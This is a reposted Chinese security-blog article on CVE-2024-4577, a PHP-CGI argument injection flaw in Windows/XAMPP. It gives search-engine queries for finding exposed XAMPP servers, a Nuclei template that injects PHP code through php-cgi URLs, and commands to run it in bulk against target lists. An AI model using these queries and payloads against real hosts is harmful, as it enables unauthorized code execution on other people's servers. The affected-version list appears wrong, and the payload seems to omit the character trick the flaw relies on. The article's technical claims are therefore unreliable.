CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

admin 2024年6月8日19:45:06评论42 views字数 1826阅读6分5秒阅读模式
 

CVE-2024-4577 - 又一个 PHP RCE:让 PHP-CGI 参数注入再次伟大!

这是我在准备Black Hat USA演讲时发现的一个附带故事/额外漏洞。我相信大部分细节已经在官方公告中涵盖 (应该很快就会发布)。尽管随着时间的推移,PHP-CGI 已逐渐被淘汰,但此漏洞默认会影响Windows 版 XAMPP,允许未经身份验证的攻击者通过特定字符序列在远程 XAMPP 服务器上执行任意代码。

鉴于 PHP 和 XAMPP 在网络生态系统中的广泛使用,我敦促大家检查自己是否受到影响并相应地更新系统。请参阅DEVCORE 发布的安全警报 以了解缓解措施。

这个漏洞非常简单,但这也是它有趣的地方。谁会想到,一个经过 12 年审查并被证明安全的补丁,会因为Windows 的一个小功能而被绕过?我相信这个功能可能会导致更多的潜在漏洞。如果你使用这种技术,别忘了参考这篇文章!https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ucoderef/d1980631-6401-428e-a49d-d71394be7da8😉

此漏洞由 DEVCORE (@d3vc0r3) 的 Orange Tsai (@orange_8361) 发现。请务必关注他的出色研究,我们的角色只是重现和开发此问题的漏洞。安全警报:CVE-2024-4577 PHP CGI 参数注入漏洞

概述 CVE-2024-4577 是 PHP 中的一个严重漏洞,影响 CGI 配置,允许攻击者通过精心设计的 URL 参数执行任意命令。

受影响的版本

  • Windows 上使用 的 PHP 7.4.29 和 8.0.19 之前的版本php-cgi

鹰图:

web.body="XAMPP"

CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

Fofa:

product="XAMPP"

CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains "CVE2024_EXP_TEST_1337" indicating a successful injection.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
      - "{{BaseURL}}/cgi-bin/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
      - "{{BaseURL}}/php-cgi/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
      - "{{BaseURL}}/index.php?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>"
    matchers:
      - type: word
        words:
          - "CVE2024_EXP_TEST_1337"
nuclei -t CVE-2024-4577.yaml -unuclei -l XXXX.TXT -t CVE-2024-4577.yaml

CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template/tree/main

 

原文始发于微信公众号(Ots安全):CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月8日19:45:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板https://cn-sec.com/archives/2831623.html

发表评论

匿名网友 填写信息